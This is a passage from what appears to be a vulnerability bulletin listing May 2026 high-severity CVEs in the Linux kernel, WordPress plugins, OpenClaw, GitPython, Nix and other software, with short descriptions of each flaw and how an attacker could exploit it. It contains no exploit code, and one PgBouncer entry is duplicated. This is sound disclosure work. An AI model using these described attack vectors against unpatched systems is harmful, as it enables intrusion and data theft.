https://git.kernel.org/stable/c/95597d11dc8bddb2b9a051c9232000bfbb5e43ba https://git.kernel.org/stable/c/950803f7254721c1c15858fbbfae3deaaeeecb11 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: soc-core: flush delayed work before removing DAIs and widgets When a sound card is unbound while a PCM stream is open, a use-after-free can occur in snd_soc_dapm_stream_event(), called from the close_delayed_work workqueue handler. During unbind, snd_soc_unbind_card() flushes delayed work and then calls soc_cleanup_card_resources(). Inside cleanup, snd_card_disconnect_sync() releases all PCM file descriptors, and the resulting PCM close path can call snd_soc_dapm_stream_stop() which schedules new delayed work with a pmdown_time timer delay. Since this happens after the flush in snd_soc_unbind_card(), the new work is not caught. soc_remove_link_components() then frees DAPM widgets before this work fires, leading to the use-after-free. The existing flush in soc_free_pcm_runtime() also cannot help as it runs after soc_remove_link_components() has already freed the widgets. Add a flush in soc_cleanup_card_resources() after snd_card_disconnect_sync() (after which no new PCM closes can schedule further delayed work) and before soc_remove_link_dais() and soc_remove_link_components() (which tear down the structures the delayed work accesses). | 2026-05-08 | 7.3 | CVE-2026-43459 | https://git.kernel.org/stable/c/bf80a89da97285d9b877e0c6995e870d46b8025c https://git.kernel.org/stable/c/3887e514978d28216246360b46a9cb534969eb5a https://git.kernel.org/stable/c/231568afbc0cd25b8fb2a94ebf9738eabe1cf007 https://git.kernel.org/stable/c/317a9298c54bb00319da73e5a7179f00e67fcbdf https://git.kernel.org/stable/c/eab71e11ce2447c1e01809cbc11eab4234cf8dc8 https://git.kernel.org/stable/c/7d33e6140945482a07f8089ee86e13e02553ffdb https://git.kernel.org/stable/c/c054f0607c8bb1b1aa529bc109e4149298a1cccd https://git.kernel.org/stable/c/95bc5c225513fc3c4ce169563fb5e3929fbb938b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: amlogic: spifc-a4: Fix DMA mapping error handling Fix three bugs in aml_sfc_dma_buffer_setup() error paths: 1. Unnecessary goto: When the first DMA mapping (sfc->daddr) fails, nothing needs cleanup. Use direct return instead of goto. 2. Double-unmap bug: When info DMA mapping failed, the code would unmap sfc->daddr inline, then fall through to out_map_data which would unmap it again, causing a double-unmap. 3. Wrong unmap size: The out_map_info label used datalen instead of infolen when unmapping sfc->iaddr, which could lead to incorrect DMA sync behavior. | 2026-05-08 | 7.8 | CVE-2026-43461 | https://git.kernel.org/stable/c/0a83d6c9e149a176340190fa9cbadf2266db4c9a https://git.kernel.org/stable/c/c0b88f1176074f80140ed77fce909f254b7180ab https://git.kernel.org/stable/c/b20b437666e1cb26a7c499d1664e8f2a0ac67000 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: spacemit: Fix error handling in emac_tx_mem_map() The DMA mappings were leaked on mapping error. Free them with the existing emac_free_tx_buf() function. | 2026-05-08 | 7.5 | CVE-2026-43462 | https://git.kernel.org/stable/c/c34ebd7b24ea70be3c6fdb6936f79f593f37df60 https://git.kernel.org/stable/c/edeaba385318f60ec1b32470da4d5eb800294d16 https://git.kernel.org/stable/c/86292155bea578ebab0ca3b65d4d87ecd8a0e9ea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: RX, Fix XDP multi-buf frag counting for legacy RQ XDP multi-buf programs can modify the layout of the XDP buffer when the program calls bpf_xdp_pull_data() or bpf_xdp_adjust_tail(). The referenced commit in the fixes tag corrected the assumption in the mlx5 driver that the XDP buffer layout doesn't change during a program execution. However, this fix introduced another issue: the dropped fragments still need to be counted on the driver side to avoid page fragment reference counting issues. Such issue can be observed with the test_xdp_native_adjst_tail_shrnk_data selftest when using a payload of 3600 and shrinking by 256 bytes (an upcoming selftest patch): the last fragment gets released by the XDP code but doesn't get tracked by the driver. This results in a negative pp_ref_count during page release and the following splat: WARNING: include/net/page_pool/helpers.h:297 at mlx5e_page_release_fragmented.isra.0+0x4a/0x50 [mlx5_core], CPU#12: ip/3137 Modules linked in: [...] CPU: 12 UID: 0 PID: 3137 Comm: ip Not tainted 6.19.0-rc3+ #12 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 RIP: 0010:mlx5e_page_release_fragmented.isra.0+0x4a/0x50 [mlx5_core] [...] Call Trace: <TASK> mlx5e_dealloc_rx_wqe+0xcb/0x1a0 [mlx5_core] mlx5e_free_rx_descs+0x7f/0x110 [mlx5_core] mlx5e_close_rq+0x50/0x60 [mlx5_core] mlx5e_close_queues+0x36/0x2c0 [mlx5_core] mlx5e_close_channel+0x1c/0x50 [mlx5_core] mlx5e_close_channels+0x45/0x80 [mlx5_core] mlx5e_safe_switch_params+0x1a5/0x230 [mlx5_core] mlx5e_change_mtu+0xf3/0x2f0 [mlx5_core] netif_set_mtu_ext+0xf1/0x230 do_setlink.isra.0+0x219/0x1180 rtnl_newlink+0x79f/0xb60 rtnetlink_rcv_msg+0x213/0x3a0 netlink_rcv_skb+0x48/0xf0 netlink_unicast+0x24a/0x350 netlink_sendmsg+0x1ee/0x410 __sock_sendmsg+0x38/0x60 ____sys_sendmsg+0x232/0x280 ___sys_sendmsg+0x78/0xb0 __sys_sendmsg+0x5f/0xb0 [...] do_syscall_64+0x57/0xc50 This patch fixes the issue by doing page frag counting on all the original XDP buffer fragments for all relevant XDP actions (XDP_TX , XDP_REDIRECT and XDP_PASS). This is basically reverting to the original counting before the commit in the fixes tag. As frag_page is still pointing to the original tail, the nr_frags parameter to xdp_update_skb_frags_info() needs to be calculated in a different way to reflect the new nr_frags. | 2026-05-08 | 7.5 | CVE-2026-43464 | https://git.kernel.org/stable/c/c74557495efb4bd0adefdfc8678ecdbc82a06da3 https://git.kernel.org/stable/c/03cb50e5b74fce8bf6d92b860371b66253cf0f8d https://git.kernel.org/stable/c/a6413e6f6c9d9bb9833324cb3753582f7bc0f2fa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xprtrdma: Decrement re_receiving on the early exit paths In the event that rpcrdma_post_recvs() fails to create a work request (due to memory allocation failure, say) or otherwise exits early, we should decrement ep->re_receiving before returning. Otherwise we will hang in rpcrdma_xprt_drain() as re_receiving will never reach zero and the completion will never be triggered. On a system with high memory pressure, this can appear as the following hung task: INFO: task kworker/u385:17:8393 blocked for more than 122 seconds. Tainted: G S E 6.19.0 #3 "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. task:kworker/u385:17 state:D stack:0 pid:8393 tgid:8393 ppid:2 task_flags:0x4248060 flags:0x00080000 Workqueue: xprtiod xprt_autoclose [sunrpc] Call Trace: <TASK> __schedule+0x48b/0x18b0 ? ib_post_send_mad+0x247/0xae0 [ib_core] schedule+0x27/0xf0 schedule_timeout+0x104/0x110 __wait_for_common+0x98/0x180 ? __pfx_schedule_timeout+0x10/0x10 wait_for_completion+0x24/0x40 rpcrdma_xprt_disconnect+0x444/0x460 [rpcrdma] xprt_rdma_close+0x12/0x40 [rpcrdma] xprt_autoclose+0x5f/0x120 [sunrpc] process_one_work+0x191/0x3e0 worker_thread+0x2e3/0x420 ? __pfx_worker_thread+0x10/0x10 kthread+0x10d/0x230 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x273/0x2b0 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1a/0x30 | 2026-05-08 | 7.5 | CVE-2026-43469 | https://git.kernel.org/stable/c/7ea69259a60a364f56cf4aa9e2eafb588d1c762b https://git.kernel.org/stable/c/8cb6b5d8296b1f99a8d36849901ebabfe3f749db https://git.kernel.org/stable/c/74c39a47856bddcde7874f2196a00143b5cd0af9 https://git.kernel.org/stable/c/49f53ee4e25297d886f14e31f355ad1c2735ddfb https://git.kernel.org/stable/c/8127b5fec04757c2a41ed65bca0b3266968efd3b https://git.kernel.org/stable/c/dc3ebd7e2d73dbd4d317785735ffa6c4a6384ddf https://git.kernel.org/stable/c/7b6275c80a0c81c5f8943272292dfe67730ce849 |
| betterdocs--BetterDocs Pro | The BetterDocs Pro plugin for WordPress is vulnerable to SQL Injection via the `get_current_letter_docs` and `docs_sort_by_letter` AJAX actions in all versions up to, and including, 3.7.0. This is due to the `limit` POST parameter being interpolated directly into a SQL query string before being passed to `$wpdb->prepare()`, which only parameterizes other variables. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The Encyclopedia feature must be enabled in BetterDocs Pro settings for the vulnerability to be exploitable. | 2026-05-07 | 7.5 | CVE-2026-4348 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5c0f02ad-f5f1-42b1-8116-e391aaa85430?source=cve https://betterdocs.co/changelog/ |
| CISA--manage.get.gov | manage.get.gov is the .gov TLD registrar maintained by CISA. manage.get.gov allows an organization administrator to assign domain manager privileges for domains not already in another organization. Fixed in 1.176.0 on or around 2026-04-30. | 2026-05-07 | 7.6 | CVE-2026-43510 | url url url url url url |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.14 contains a server-side request forgery vulnerability in browser SSRF policy that allows private-network navigation by default. Attackers can exploit this misconfiguration to access internal services or metadata endpoints through browser-driven requests. | 2026-05-05 | 7.7 | CVE-2026-43527 | GitHub Security Advisory (GHSA-53vx-pmqw-863c) Patch Commit (1) Patch Commit (2) Patch Commit (3) Patch Commit (4) VulnCheck Advisory: OpenClaw < 2026.4.14 - Server-Side Request Forgery via Private Network Navigation |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.9 contains an environment variable injection vulnerability allowing malicious workspace .env files to set runtime-control variables. Attackers can inject variables affecting update sources, gateway URLs, ClawHub resolution, and browser executable paths to compromise application behavior. | 2026-05-05 | 7.3 | CVE-2026-43531 | GitHub Security Advisory (GHSA-7wv4-cc7p-jhxc) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.9 - Environment Variable Injection via Workspace .env File |
| OpenClaw--OpenClaw | OpenClaw versions 2026.4.7 before 2026.4.10 fail to normalize Discord event cover image parameters in sandbox media processing. Attackers can bypass media normalization to inject host-local media references into channel action paths expecting normalized media. | 2026-05-05 | 7.7 | CVE-2026-43532 | GitHub Security Advisory (GHSA-c9h3-5p7r-mrjh) Patch Commit VulnCheck Advisory: OpenClaw 2026.4.7 < 2026.4.10 - Sandbox Media Normalization Bypass via Discord Event Cover Image |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains a server-side request forgery policy bypass vulnerability in existing-session browser interaction routes. Attackers can bypass SSRF navigation guards to interact with or navigate to unauthorized targets without policy enforcement. | 2026-05-05 | 7.7 | CVE-2026-43573 | GitHub Security Advisory (GHSA-527m-976r-jf79) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - SSRF Policy Bypass in Existing-Session Browser Interaction Routes |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.5 contains a server-side request forgery vulnerability in the CDP /json/version WebSocket endpoint that allows attackers to pivot to untrusted second-hop targets. The webSocketDebuggerUrl response field is not properly validated, enabling attackers to redirect connections to arbitrary hosts and perform SSRF-style attacks. | 2026-05-06 | 7.7 | CVE-2026-43576 | GitHub Security Advisory (GHSA-f7fh-qg34-x2xh) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.5 - Second-hop SSRF via CDP /json/version WebSocket URL |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains an incomplete navigation guard vulnerability that allows attackers to trigger navigation without complete SSRF policy enforcement. Browser press/type style interactions, including pressKey and type submit flows, can bypass post-action security checks to execute unauthorized navigation. | 2026-05-06 | 7.7 | CVE-2026-43580 | GitHub Security Advisory (GHSA-536q-mj95-h29h) Patch Commit (1) Patch Commit (2) Patch Commit (3) VulnCheck Advisory: OpenClaw < 2026.4.10 - Incomplete Navigation Guard Coverage in Browser Interactions |
| horsicq--DIE-engine | Detect-It-Easy prior to 3.21 contains a path traversal vulnerability that allows attackers to write arbitrary files to the filesystem by crafting malicious archive entries with relative traversal sequences or absolute paths. Attackers can exploit insufficient path normalization during archive extraction to write files outside the intended extraction directory and achieve persistent code execution by overwriting user startup scripts. | 2026-05-04 | 7.1 | CVE-2026-43616 | https://github.com/horsicq/DIE-engine/releases/tag/3.21 https://github.com/horsicq/Detect-It-Easy https://github.com/horsicq/Formats/commit/56cdf50ee3c72c56284e2819b23e98332842d259 https://github.com/horsicq/XArchive/commit/6a2aa84c2fd120b704f76bb5c5ee3e9b5a7a0fcc https://github.com/horsicq/DIE-engine/commit/cbbe1688e58ffd430d284bf65f336973f083db69 https://github.com/horsicq/DIE-engine/commit/7fd300b926daf19707b2a36f0abe8b60a51308ee https://www.vulncheck.com/advisories/detect-it-easy-path-traversal-arbitrary-file-write |
| electerm--electerm | electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to version 3.7.9, a code execution (RCE) vulnerability exists in electerm's SFTP open with system editor or "Edit with custom editor" feature. When a user opts to edit a file using open with system editor or open with a custom editor, the filename is passed directly into a command line without sanitization. A malicious actor controlling the SSH server or user OS can exploit this by crafting a filename containing shell metacharacters. If a victim subsequently attempts to edit this file, the injected commands are executed on their machine with the user's privileges. This could allow the attacker to run arbitrary code, install malware, or move laterally within the network. This issue has been patched in version 3.7.9. | 2026-05-08 | 7.8 | CVE-2026-43943 | https://github.com/electerm/electerm/security/advisories/GHSA-q4p8-8j9m-8hxj https://github.com/electerm/electerm/commit/24ce7103e264cffe6eb5476c0506a2379e6f8333 https://github.com/electerm/electerm/releases/tag/v3.7.9 |
| NixOS--Nix | An issue was discovered in Nix before 2.34.7 and Lix before 2.95.2. Unbounded recursion in the NAR (Nix Archive) parser could lead to a stack-to-heap overflow when the parser is run on a coroutine stack. The stack is allocated without a guard page, which means that a stack overflow could overwrite memory on the heap and could allow arbitrary code execution as the Nix daemon (run as root in multi-user installations) if ASLR hardening is bypassed. This can be exploited by all users able to connect to the daemon (e.g., in Nix, this is configurable via the allowed-users setting, defaulting to all users). The fixed versions are 2.34.7, 2.33.6, 2.32.8, 2.31.5, 2.30.5, 2.29.4, and 2.28.7 for Nix (introduced in 2.24.4); and 2.95.2, 2.94.2, and 2.93.4 for Lix (introduced in 2.93.0). | 2026-05-05 | 7.5 | CVE-2026-44028 | https://discourse.nixos.org/t/security-advisory-local-privilege-escalation-in-lix-and-nix/77407 https://github.com/NixOS/nix/security/advisories/GHSA-vh5x-56v6-4368 https://www.openwall.com/lists/oss-security/2026/05/04/33 https://www.openwall.com/lists/oss-security/2026/05/04/32 https://lix.systems/blog/2026-05-05-lix-unsigned-integer-overflow/ |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.20 fails to properly reserve the OPENCLAW_ runtime-control environment namespace in workspace dotenv files, allowing attackers to override critical runtime variables. Malicious workspaces can set variables like OPENCLAW_GIT_DIR to manipulate trusted OpenClaw runtime behavior during source-update or installer flows. | 2026-05-06 | 7.8 | CVE-2026-44114 | GitHub Security Advisory (GHSA-hxvm-xjvf-93f3) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.20 - Environment Variable Namespace Collision via Workspace dotenv |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.22 derives loopback MCP owner context from spoofable server-issued bearer tokens in request headers. Non-owner loopback clients can present themselves as owner to bypass owner-gated operations by manipulating the sender-owner header metadata. | 2026-05-06 | 7.8 | CVE-2026-44118 | GitHub Security Advisory (GHSA-r6xh-pqhr-v4xh) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.22 - Owner Context Spoofing via Bearer Token Header |
| gitpython-developers--GitPython | GitPython is a python library used to interact with Git repositories. Prior to version 3.1.49, GitConfigParser.set_value() passes values to Python's configparser without validating for newlines. GitPython's own _write() converts embedded newlines into indented continuation lines (e.g. \n becomes \n\t), but Git still accepts an indented [core] stanza as a section header - so the injected core.hooksPath becomes effective configuration. Any Git operation that invokes hooks (commit, merge, checkout) will then execute scripts from the attacker-controlled path. This issue has been patched in version 3.1.49. | 2026-05-07 | 7.8 | CVE-2026-44244 | https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-v87r-6q3f-2j67 https://github.com/gitpython-developers/GitPython/releases/tag/3.1.49 |
| MervinPraison--PraisonAI | PraisonAI is a multi-agent teams system. From version 2.5.6 to before version 4.6.34, PraisonAI ships a legacy Flask API server with authentication disabled by default. When that server is used, any caller that can reach it can access /agents and trigger the configured agents.yaml workflow through /chat without providing a token. This issue has been patched in version 4.6.34. | 2026-05-08 | 7.3 | CVE-2026-44338 | https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6rmh-7xcm-cpxj |
| Postorius project--Postorius | Postorius through 1.3.13 does not escape HTML in the message subject when rendering it in the Held messages pop-up, as exploited in the wild in May 2026. | 2026-05-07 | 7.2 | CVE-2026-44742 | https://gitlab.com/mailman/postorius/-/commit/c4706abd05ba6bcf472fc674b160d3a9d6a4868b https://gitlab.com/mailman/postorius/-/merge_requests/972 https://gitlab.com/mailman/postorius/-/issues/620 https://www.openwall.com/lists/oss-security/2026/05/07/3 |
| wproyal--Royal Addons for Elementor Addons and Templates Kit for Elementor | The Royal Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'status' parameter in the wpr_update_form_action_meta AJAX action in all versions up to, and including, 1.7.1056. This is due to insufficient input sanitization and output escaping, combined with a publicly leaked nonce that allows unauthenticated access to the AJAX handler. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-05 | 7.2 | CVE-2026-4803 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c91a14d3-bc41-4490-888c-486ad2994095?source=cve https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/classes/modules/forms/wpr-actions-status.php#L73 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/plugin.php#L613 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/classes/modules/forms/wpr-actions-status.php#L21 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/classes/modules/forms/wpr-submissions-cpt.php#L23 https://plugins.trac.wordpress.org/changeset/3503219/royal-elementor-addons/trunk/classes/modules/forms/wpr-actions-status.php |
| strategy11team--AWP Classifieds | The AWP Classifieds plugin for WordPress is vulnerable to SQL Injection via the 'regions' parameter array keys in versions up to, and including, 4.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-05 | 7.5 | CVE-2026-5100 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7908d167-f831-4ed0-b754-2b390b5c3b2c?source=cve https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1240 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1258 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1269 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1276 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L63 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L70 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L168 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L174 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/class-awpcp.php#L339 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/class-awpcp.php#L342 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L795 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L804 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L881 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L887 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L890 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L895 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L902 https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L903 |
| wpmudev--Forminator Forms Contact Form, Payment Form & Custom Form Builder | The Forminator Forms - Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Path Traversal in versions up to, and including, 1.52.1 via the 'upload-1[file][file_path]' parameter. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. Successful exploitation requires a publicly accessible form with a File Upload field where Save and Continue is enabled in that form's Behavior settings and the Save and Continue email notification is configured to attach uploaded files in Email Notifications. | 2026-05-05 | 7.5 | CVE-2026-5192 | https://www.wordfence.com/threat-intel/vulnerabilities/id/788422c4-e070-48aa-a85d-a5d5a25a6a1d?source=cve https://plugins.trac.wordpress.org/changeset/3500671/forminator |
| Ivanti--Endpoint Manager Mobile | An Improper Access Control in Ivanti EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1 allows a remote unauthenticated attacker to invoke arbitrary methods. | 2026-05-07 | 7 | CVE-2026-5788 | https://hub.ivanti.com/s/article/May-2026-Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-Multiple-CVEs |
| fast-uri--fast-uri | fast-uri decoded percent-encoded path separators and dot segments before applying dot-segment removal in its normalize() and equal() functions. Encoded path data was treated like real slashes and parent-directory references, so distinct URIs could collapse onto the same normalized path. Applications that normalize or compare attacker-controlled URLs to enforce path-based policy can be bypassed, with a path that appears confined under an allowed prefix normalizing to a different location. Versions <= 3.1.0 are affected. Update to 3.1.1 or later. | 2026-05-04 | 7.5 | CVE-2026-6321 | https://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6 https://cna.openjsf.org/security-advisories.html |
| fast-uri--fast-uri | fast-uri normalize() decoded percent-encoded authority delimiters inside the host component and then re-emitted them as raw delimiters during serialization. A host that combined an allowed domain, an encoded at-sign, and a different domain was re-emitted with the at-sign as a raw userinfo separator, changing the URI's authority to the second domain. Applications that normalize untrusted URLs before host allowlist checks, redirect validation, or outbound request routing can be steered to a different authority than the input appeared to specify. Versions <= 3.1.1 are affected. Update to 3.1.2 or later. | 2026-05-05 | 7.5 | CVE-2026-6322 | https://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc https://cna.openjsf.org/security-advisories.html |
| MAXHUB--MAXHUB Pivot client application | This vulnerability, in the MAXHUB Pivot client application versions prior to v1.36.2, may allow an attacker to obtain encrypted tenant email addresses and related metadata from any tenant. Due to the presence of a hardcoded AES key within the application, the encrypted data can be decrypted, enabling access to tenant email addresses and associated information in cleartext. Furthermore, an attacker may be able to cause a denial-of-service condition by enrolling multiple unauthorized devices into a tenant via MQTT, potentially disrupting tenant operations. | 2026-05-07 | 7.3 | CVE-2026-6411 | https://www.maxhub.com/en/support/ https://www.cisa.gov/news-events/ics-advisories/icsa-26-127-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-127-01.json |
| www[.]pgbouncer[.]org--PgBouncer | An integer overflow in network packet parsing code in PgBouncer before 1.25.2 bypasses a boundary check and can lead to a crash. An unauthenticated remote attacker can crash PgBouncer with a malformed SCRAM authentication packet. | 2026-05-09 | 7.5 | CVE-2026-6664 | https://www.pgbouncer.org/changelog.html#pgbouncer-125x |
| www[.]pgbouncer[.]org--PgBouncer | An integer overflow in network packet parsing code in PgBouncer before 1.25.2 bypasses a boundary check and can lead to a crash. An unauthenticated remote attacker can crash PgBouncer with a malformed SCRAM authentication packet. | 2026-05-09 | 7.5 | CVE-2026-6664 | https://www.pgbouncer.org/changelog.html#pgbouncer-125x |
| MongoDB Inc.--MongoDB C Driver | The MongoDB C Driver's Cyrus SASL integration performs unsafe string copying during username canonicalization, enabling a heap buffer overflow before any authentication or network traffic. This may be triggered by passing untrusted input in the username of a MongoDB URI with authMechanism=GSSAPI. | 2026-05-06 | 7.8 | CVE-2026-6691 | https://jira.mongodb.org/browse/CDRIVER-6134 |
| Ivanti--Endpoint Manager Mobile | An Improper Input Validation in Ivanti EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1 allows a remotely authenticated user with administrative access to achieve remote code execution. | 2026-05-07 | 7.2 | CVE-2026-6973 | https://hub.ivanti.com/s/article/May-2026-Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-Multiple-CVEs?language=en_US |
| thedark--Auto Affiliate Links | The Auto Affiliate Links plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 6.8.8 This is due to insufficient input sanitization on the 'url' POST parameter in the aal_url_stats_save_action() function and a complete absence of output escaping in aal_display_clicks(), where the stored value is echoed directly into an anchor element's href attribute and inner text without esc_url(), esc_attr(), or esc_html(). This makes it possible for unauthenticated attackers to inject arbitrary web scripts into the admin statistics page that execute in an administrator's browser when the page is visited, leveraging a publicly exposed nonce and an unauthenticated AJAX endpoint registered via the wp_ajax_nopriv_ hook. | 2026-05-08 | 7.2 | CVE-2026-7330 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6c8ed84e-3504-42e3-821d-794198d7adda?source=cve https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/tags/6.8.6/aal_stats.php#L225 https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/trunk/aal_stats.php#L225 https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/tags/6.8.8/aal_stats.php#L225 https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/trunk/aal_stats.php#L304 https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/tags/6.8.8/aal_stats.php#L304 https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/trunk/aal_stats.php#L278 https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/tags/6.8.8/aal_stats.php#L278 https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/tags/6.8.6/aal_stats.php#L304 https://plugins.trac.wordpress.org/browser/wp-auto-affiliate-links/tags/6.8.6/aal_stats.php#L278 https://plugins.trac.wordpress.org/changeset/3519003/wp-auto-affiliate-links/trunk/aal_stats.php https://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-auto-affiliate-links/tags/6.8.8&new_path=%2Fwp-auto-affiliate-links/tags/6.8.8.1 |
| latepoint--LatePoint Calendar Booking Plugin for Appointments and Events | The LatePoint - Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'booking_form_page_url' parameter in all versions up to, and including, 5.5.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The malicious activity log entry is written to the database even when Stripe is not configured, because the latepoint_order_intent_created action hook fires before the Stripe Connect account ID is validated, meaning a fully functional Stripe integration is not required for exploitation. | 2026-05-06 | 7.2 | CVE-2026-7332 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c03ddcf0-6955-4645-b311-c3833ca61455?source=cve https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/controllers/activities_controller.php#L214 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/controllers/activities_controller.php#L214 https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/controllers/stripe_connect_controller.php#L260 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/controllers/stripe_connect_controller.php#L260 https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/helpers/activities_helper.php#L83 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/helpers/activities_helper.php#L83 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.1/lib/controllers/activities_controller.php#L214 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.1/lib/controllers/stripe_connect_controller.php#L260 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.1/lib/helpers/activities_helper.php#L83 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3522933%40latepoint%2Ftrunk&old=3516282%40latepoint%2Ftrunk&sfp_email=&sfph_mail= |
| GeoVision Inc.--GV-LPC2011/LPC2211 | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the Web Interface / ssi.cgi functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted malicious url can lead to an arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. Reflected XXS via the error message for requesting non-existing page. | 2026-05-04 | 7.4 | CVE-2026-7371 | https://www.geovision.com.tw/cyber_security.php https://talosintelligence.com/vulnerability_reports/ |
| Yarbo--Firmware | A hidden, persistent backdoor was found in Yarbo firmware v2.3.9 that provides remote, unauthenticated (or weakly authenticated) access to privileged functionality. The backdoor is undocumented, cannot be disabled via user-facing settings, and survives factory reset and ordinary firmware updates. | 2026-05-07 | 7.2 | CVE-2026-7413 | https://github.com/Bin4ry/yarbo-nat-in-my-back-yard https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000000111111111111111111111110000000000000000000000000000000000000000000000000000000111 |
